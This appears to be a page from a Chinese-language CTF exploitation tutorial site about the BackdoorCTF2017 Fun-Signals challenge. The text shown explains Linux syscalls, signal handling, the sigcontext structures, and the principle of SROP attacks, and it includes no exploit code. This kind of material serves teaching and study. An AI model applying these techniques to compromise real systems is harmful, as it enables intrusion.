



<!DOCTYPE html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      
      
      
      
        <meta name="lang:clipboard.copy" content="复制">
      
        <meta name="lang:clipboard.copied" content="已复制">
      
        <meta name="lang:search.language" content="jp">
      
        <meta name="lang:search.pipeline.stopwords" content="True">
      
        <meta name="lang:search.pipeline.trimmer" content="True">
      
        <meta name="lang:search.result.none" content="没有找到符合条件的结果">
      
        <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
      
        <meta name="lang:search.result.other" content="# 个符合条件的结果">
      
        <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
      
      <link rel="shortcut icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-0.17.2, mkdocs-material-2.6.6">
    
    
      
        <title>BackdoorCTF2017 Fun-Signals - 二进制漏洞挖掘与利用</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/application.78aab2dc.css">
      
        <link rel="stylesheet" href="../../../assets/stylesheets/application-palette.6079476c.css">
      
    
    
      <script src="../../../assets/javascripts/modernizr.1aa3b519.js"></script>
    
    
      <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
      
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Fira+Sans:300,400,400i,700|Fira+Mono">
        <style>body,input{font-family:"Fira Sans","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Fira Mono","Courier New",Courier,monospace}</style>
      
      <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    
    
      <link rel="stylesheet" href="../../../_static/css/extra.css">
    
    
  </head>
  
    
    
    <body dir="ltr" data-md-color-primary="white" data-md-color-accent="red">
  
    <svg class="md-svg">
      <defs>
        
        
      </defs>
    </svg>
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="drawer">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="search">
    <label class="md-overlay" data-md-component="overlay" for="drawer"></label>
    
      <a href="#srop" tabindex="1" class="md-skip">
        跳转至
      </a>
    
    
      <header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid">
    <div class="md-flex">
      <div class="md-flex__cell md-flex__cell--shrink">
        <a href="../../.." title="二进制漏洞挖掘与利用" class="md-header-nav__button md-logo">
          
            <i class="md-icon">school</i>
          
        </a>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        <label class="md-icon md-icon--menu md-header-nav__button" for="drawer"></label>
      </div>
      <div class="md-flex__cell md-flex__cell--stretch">
        <div class="md-flex__ellipsis md-header-nav__title" data-md-component="title">
          
            
              <span class="md-header-nav__topic">
                二进制漏洞挖掘与利用
              </span>
              <span class="md-header-nav__topic">
                BackdoorCTF2017 Fun-Signals
              </span>
            
          
        </div>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        
          
            <label class="md-icon md-icon--search md-header-nav__button" for="search"></label>
            
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="query" data-md-state="active">
      <label class="md-icon md-search__icon" for="search"></label>
      <button type="reset" class="md-icon md-search__icon" data-md-component="reset" tabindex="-1">
        &#xE5CD;
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="result">
          <div class="md-search-result__meta">
            键入以开始搜索
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
          
        
      </div>
      
    </div>
  </nav>
</header>
    
    <div class="md-container">
      
        
      
      
        

  

<nav class="md-tabs md-tabs--active" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../.." title="简介" class="md-tabs__link">
          简介
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../stackoverflow/stack_intro/" title="栈溢出" class="md-tabs__link">
          栈溢出
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../fmtstr/fmtstr_intro/" title="格式化字符串漏洞" class="md-tabs__link">
          格式化字符串漏洞
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../heap/introduction/" title="堆利用" class="md-tabs__link">
          堆利用
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../io_file/introduction/" title="IO_FILE 利用" class="md-tabs__link">
          IO_FILE 利用
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../race-condition/introduction/" title="条件竞争" class="md-tabs__link">
          条件竞争
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../6.1.1_pwn_hctf2016_brop/" title="练习" class="md-tabs__link md-tabs__link--active">
          练习
        </a>
      
    </li>
  

      
    </ul>
  </div>
</nav>
      
      <main class="md-main">
        <div class="md-main__inner md-grid" data-md-component="container">
          
            
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    <nav class="md-nav md-nav--primary" data-md-level="0">
  <label class="md-nav__title md-nav__title--site" for="drawer">
    <span class="md-nav__button md-logo">
      
        <i class="md-icon">school</i>
      
    </span>
    二进制漏洞挖掘与利用
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-1" type="checkbox" id="nav-1">
    
    <label class="md-nav__link" for="nav-1">
      简介
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-1">
        简介
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../.." title="简介" class="md-nav__link">
      简介
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2">
    
    <label class="md-nav__link" for="nav-2">
      栈溢出
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        栈溢出
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/stack_intro/" title="栈介绍" class="md-nav__link">
      栈介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/stackoverflow_basic/" title="栈溢出原理" class="md-nav__link">
      栈溢出原理
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/basic_rop/" title="基本 ROP" class="md-nav__link">
      基本 ROP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/others/" title="花式栈溢出技巧" class="md-nav__link">
      花式栈溢出技巧
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/medium_rop/" title="中级 ROP" class="md-nav__link">
      中级 ROP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/advanced_rop/" title="高级 ROP" class="md-nav__link">
      高级 ROP
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-3" type="checkbox" id="nav-3">
    
    <label class="md-nav__link" for="nav-3">
      格式化字符串漏洞
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-3">
        格式化字符串漏洞
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_intro/" title="格式化字符串漏洞原理介绍" class="md-nav__link">
      格式化字符串漏洞原理介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_exploit/" title="格式化字符串漏洞利用" class="md-nav__link">
      格式化字符串漏洞利用
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_example/" title="格式化字符串漏洞例子" class="md-nav__link">
      格式化字符串漏洞例子
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_detect/" title="格式化字符串漏洞检测" class="md-nav__link">
      格式化字符串漏洞检测
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-3-5" type="checkbox" id="nav-3-5">
    
    <label class="md-nav__link" for="nav-3-5">
      实验
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="2">
      <label class="md-nav__title" for="nav-3-5">
        实验
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/example/picoctf-2014-guess/Write-up_cn/" title="picoctf-2014 guess" class="md-nav__link">
      picoctf-2014 guess
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4">
    
    <label class="md-nav__link" for="nav-4">
      堆利用
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-4">
        堆利用
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/introduction/" title="堆利用简介" class="md-nav__link">
      堆利用简介
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_overview/" title="堆概述" class="md-nav__link">
      堆概述
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_structure/" title="堆相关数据结构" class="md-nav__link">
      堆相关数据结构
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_implementation_details/" title="深入理解堆的实现" class="md-nav__link">
      深入理解堆的实现
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heapoverflow_basic/" title="堆溢出" class="md-nav__link">
      堆溢出
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/off_by_one/" title="堆中的 Off-By-One" class="md-nav__link">
      堆中的 Off-By-One
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/unlink/" title="Unlink" class="md-nav__link">
      Unlink
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/use_after_free/" title="Use After Free" class="md-nav__link">
      Use After Free
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/fastbin_attack/" title="Fastbin Attack" class="md-nav__link">
      Fastbin Attack
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/chunk_extend_shrink/" title="Chunk Extend / Shrink" class="md-nav__link">
      Chunk Extend / Shrink
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_einherjar/" title="House Of Einherjar" class="md-nav__link">
      House Of Einherjar
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_lore/" title="House of Lore" class="md-nav__link">
      House of Lore
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_force/" title="House Of Force" class="md-nav__link">
      House Of Force
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/unsorted_bin_attack/" title="Unsorted Bin Attack" class="md-nav__link">
      Unsorted Bin Attack
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_orange/" title="House of Orange" class="md-nav__link">
      House of Orange
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-5" type="checkbox" id="nav-5">
    
    <label class="md-nav__link" for="nav-5">
      IO_FILE 利用
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-5">
        IO_FILE 利用
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/introduction/" title="FILE 文件结构介绍" class="md-nav__link">
      FILE 文件结构介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/fake-vtable-exploit/" title="伪造 vtable 劫持程序流程" class="md-nav__link">
      伪造 vtable 劫持程序流程
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/fsop/" title="FSOP" class="md-nav__link">
      FSOP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/exploit-in-libc2.24/" title="新版本 libc 下 IO_FILE 的利用" class="md-nav__link">
      新版本 libc 下 IO_FILE 的利用
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-6" type="checkbox" id="nav-6">
    
    <label class="md-nav__link" for="nav-6">
      条件竞争
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-6">
        条件竞争
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../race-condition/introduction/" title="条件竞争介绍" class="md-nav__link">
      条件竞争介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../race-condition/problem/" title="例题" class="md-nav__link">
      例题
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      

  


  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-7" type="checkbox" id="nav-7" checked>
    
    <label class="md-nav__link" for="nav-7">
      练习
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-7">
        练习
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.1_pwn_hctf2016_brop/" title="HCTF2016 brop" class="md-nav__link">
      HCTF2016 brop
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.2_pwn_njctf2017_pingme/" title="NJCTF2017 pingme" class="md-nav__link">
      NJCTF2017 pingme
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.3_pwn_xdctf2015_pwn200/" title="XDCTF2015 pwn200" class="md-nav__link">
      XDCTF2015 pwn200
    </a>
  </li>

        
          
          
          

  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-toggle md-nav__toggle" data-md-toggle="toc" type="checkbox" id="toc">
    
    
      <label class="md-nav__link md-nav__link--active" for="toc">
        BackdoorCTF2017 Fun-Signals
      </label>
    
    <a href="./" title="BackdoorCTF2017 Fun-Signals" class="md-nav__link md-nav__link--active">
      BackdoorCTF2017 Fun-Signals
    </a>
    
      
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#srop" title="SROP 原理" class="md-nav__link">
    SROP 原理
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#linux" title="Linux 系统调用" class="md-nav__link">
    Linux 系统调用
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#signal" title="signal 机制" class="md-nav__link">
    signal 机制
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#srop_1" title="SROP" class="md-nav__link">
    SROP
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#pwnlibropsrop" title="pwnlib.rop.srop" class="md-nav__link">
    pwnlib.rop.srop
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#backdoorctf2017-fun-signals" title="BackdoorCTF2017 Fun Signals" class="md-nav__link">
    BackdoorCTF2017 Fun Signals
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_1" title="参考资料" class="md-nav__link">
    参考资料
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
    
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.5_pwn_grehackctf2017_beerfighter/" title="GreHackCTF2017 beerfighter" class="md-nav__link">
      GreHackCTF2017 beerfighter
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.6_pwn_defconctf2015_fuckup/" title="DefconCTF2015 fuckup" class="md-nav__link">
      DefconCTF2015 fuckup
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.7_pwn_0ctf2015_freenote/" title="0CTF2015 freenote" class="md-nav__link">
      0CTF2015 freenote
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.8_pwn_dctf2017_flex/" title="DCTF2017 Flex" class="md-nav__link">
      DCTF2017 Flex
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.9_rhme3_exploitation/" title="RHme3 Exploitation" class="md-nav__link">
      RHme3 Exploitation
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.10_0ctf2017_babyheap2017/" title="0CTF2017 BabyHeap2017" class="md-nav__link">
      0CTF2017 BabyHeap2017
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../6.1.11_9447ctf2015_search_engine/" title="9447CTF2015 Search-Engine" class="md-nav__link">
      9447CTF2015 Search-Engine
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#srop" title="SROP 原理" class="md-nav__link">
    SROP 原理
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#linux" title="Linux 系统调用" class="md-nav__link">
    Linux 系统调用
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#signal" title="signal 机制" class="md-nav__link">
    signal 机制
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#srop_1" title="SROP" class="md-nav__link">
    SROP
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#pwnlibropsrop" title="pwnlib.rop.srop" class="md-nav__link">
    pwnlib.rop.srop
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#backdoorctf2017-fun-signals" title="BackdoorCTF2017 Fun Signals" class="md-nav__link">
    BackdoorCTF2017 Fun Signals
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_1" title="参考资料" class="md-nav__link">
    参考资料
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                
                  <h1>BackdoorCTF2017 Fun-Signals</h1>
                
                <ul>
<li><a href="#srop-原理">SROP 原理</a></li>
<li><a href="#linux-系统调用">Linux 系统调用</a></li>
<li><a href="#signal-机制">signal 机制</a></li>
<li><a href="#srop">SROP</a></li>
<li><a href="#pwnlibropsrop">pwnlib.rop.srop</a></li>
<li><a href="#backdoorctf2017-fun-signals">BackdoorCTF2017 Fun Signals</a></li>
<li><a href="#参考资料">参考资料</a></li>
</ul>
<p><a href="../../src/writeup/6.1.4_pwn_backdoorctf2017_fun_signals">下载文件</a></p>
<h2 id="srop">SROP 原理<a class="headerlink" href="#srop" title="Permanent link">&para;</a></h2>
<h4 id="linux">Linux 系统调用<a class="headerlink" href="#linux" title="Permanent link">&para;</a></h4>
<p>在开始这一切之前，我想先讲一下 Linux 的系统调用。64 位和 32 位的系统调用表分别在
<code>/usr/include/asm/unistd_64.h</code> 和 <code>/usr/include/asm/unistd_32.h</code> 中，另外还需要查看 <code>/usr/include/bits/syscall.h</code>。</p>
<p>一开始 Linux 是通过 <code>int 0x80</code> 中断的方式进入系统调用，它会先进行调用者特权级别的检查，然后进行压栈、跳转等操作，这无疑会浪费许多资源。从 Linux 2.6 开始，就出现了新的系统调用指令 <code>sysenter</code>/<code>sysexit</code>，前者用于从 Ring3 进入 Ring0，后者用于从 Ring0 返回 Ring3，它没有特权级别检查，也没有压栈的操作，所以执行速度更快。</p>
<h4 id="signal">signal 机制<a class="headerlink" href="#signal" title="Permanent link">&para;</a></h4>
<p><img alt="" src="../../pic/6.1.4_signal.png" /></p>
<p>如图所示，当有中断或异常产生时，内核会向某个进程发送一个 signal，该进程被挂起并进入内核（1），然后内核为该进程保存相应的上下文，然后跳转到之前注册好的 signal handler 中处理相应的 signal（2），当 signal handler 返回后（3），内核为该进程恢复之前保存的上下文，最终恢复进程的执行（4）。</p>
<ul>
<li>一个 signal frame 被添加到栈，这个 frame 中包含了当前寄存器的值和一些 signal 信息。</li>
<li>一个新的返回地址被添加到栈顶，这个返回地址指向 <code>sigreturn</code> 系统调用。</li>
<li>signal handler 被调用，signal handler 的行为取决于收到什么 signal。</li>
<li>signal handler 执行完之后，如果程序没有终止，则返回地址用于执行 <code>sigreturn</code> 系统调用。</li>
<li><code>sigreturn</code> 利用 signal frame 恢复所有寄存器以回到之前的状态。</li>
<li>最后，程序执行继续。</li>
</ul>
<p>不同的架构会有不同的 signal frame，下面是 32 位结构，<code>sigcontext</code> 结构体会被 push 到栈中：
<div class="codehilite"><pre><span></span><span class="k">struct</span> <span class="n">sigcontext</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">gs</span><span class="p">,</span> <span class="n">__gsh</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">fs</span><span class="p">,</span> <span class="n">__fsh</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">es</span><span class="p">,</span> <span class="n">__esh</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">ds</span><span class="p">,</span> <span class="n">__dsh</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">edi</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">esi</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ebp</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">esp</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ebx</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">edx</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ecx</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">eax</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">trapno</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">err</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">eip</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">cs</span><span class="p">,</span> <span class="n">__csh</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">eflags</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">esp_at_signal</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">ss</span><span class="p">,</span> <span class="n">__ssh</span><span class="p">;</span>
  <span class="k">struct</span> <span class="n">_fpstate</span> <span class="o">*</span> <span class="n">fpstate</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">oldmask</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cr2</span><span class="p">;</span>
<span class="p">};</span>
</pre></div>
下面是 64 位，push 到栈中的其实是 <code>ucontext_t</code> 结构体：
<div class="codehilite"><pre><span></span><span class="c1">// defined in /usr/include/sys/ucontext.h</span>
<span class="cm">/* Userlevel context.  */</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">ucontext_t</span>
  <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">int</span> <span class="n">uc_flags</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">ucontext_t</span> <span class="o">*</span><span class="n">uc_link</span><span class="p">;</span>
    <span class="n">stack_t</span> <span class="n">uc_stack</span><span class="p">;</span>           <span class="c1">// the stack used by this context</span>
    <span class="n">mcontext_t</span> <span class="n">uc_mcontext</span><span class="p">;</span>     <span class="c1">// the saved context</span>
    <span class="kt">sigset_t</span> <span class="n">uc_sigmask</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_libc_fpstate</span> <span class="n">__fpregs_mem</span><span class="p">;</span>
  <span class="p">}</span> <span class="n">ucontext_t</span><span class="p">;</span>

<span class="c1">// defined in /usr/include/bits/types/stack_t.h</span>
<span class="cm">/* Structure describing a signal stack.  */</span>
<span class="k">typedef</span> <span class="k">struct</span>
  <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">ss_sp</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">ss_size</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ss_flags</span><span class="p">;</span>
  <span class="p">}</span> <span class="n">stack_t</span><span class="p">;</span>

<span class="c1">// difined in /usr/include/bits/sigcontext.h</span>
<span class="k">struct</span> <span class="n">sigcontext</span>
<span class="p">{</span>
  <span class="n">__uint64_t</span> <span class="n">r8</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r9</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r10</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r11</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r12</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r13</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r14</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">r15</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rdi</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rsi</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rbp</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rbx</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rdx</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rax</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rcx</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rsp</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">rip</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">eflags</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">cs</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">gs</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">fs</span><span class="p">;</span>
  <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">__pad0</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">err</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">trapno</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">oldmask</span><span class="p">;</span>
  <span class="n">__uint64_t</span> <span class="n">cr2</span><span class="p">;</span>
  <span class="n">__extension__</span> <span class="k">union</span>
    <span class="p">{</span>
      <span class="k">struct</span> <span class="n">_fpstate</span> <span class="o">*</span> <span class="n">fpstate</span><span class="p">;</span>
      <span class="n">__uint64_t</span> <span class="n">__fpstate_word</span><span class="p">;</span>
    <span class="p">};</span>
  <span class="n">__uint64_t</span> <span class="n">__reserved1</span> <span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="p">};</span>
</pre></div>
就像下面这样：</p>
<p><img alt="" src="../../pic/6.1.4_sigret.jpg" /></p>
<h4 id="srop_1">SROP<a class="headerlink" href="#srop_1" title="Permanent link">&para;</a></h4>
<p>SROP，即 Sigreturn Oriented Programming，正是利用了 Sigreturn 机制的弱点，来进行攻击。</p>
<p>首先系统在执行 <code>sigreturn</code> 系统调用的时候，不会对 signal 做检查，它不知道当前的这个 frame 是不是之前保存的那个 frame。由于 <code>sigreturn</code> 会从用户栈上恢复恢复所有寄存器的值，而用户栈是保存在用户进程的地址空间中的，是用户进程可读写的。如果攻击者可以控制了栈，也就控制了所有寄存器的值，而这一切只需要一个 gadget：<code>syscall; ret;</code>。</p>
<p>另外，这个 gadget 在一些系统上没有被内存随机化处理，所以可以在相同的位置上找到，参照下图：</p>
<p><img alt="" src="../../pic/6.1.4_sigret_aslr.png" /></p>
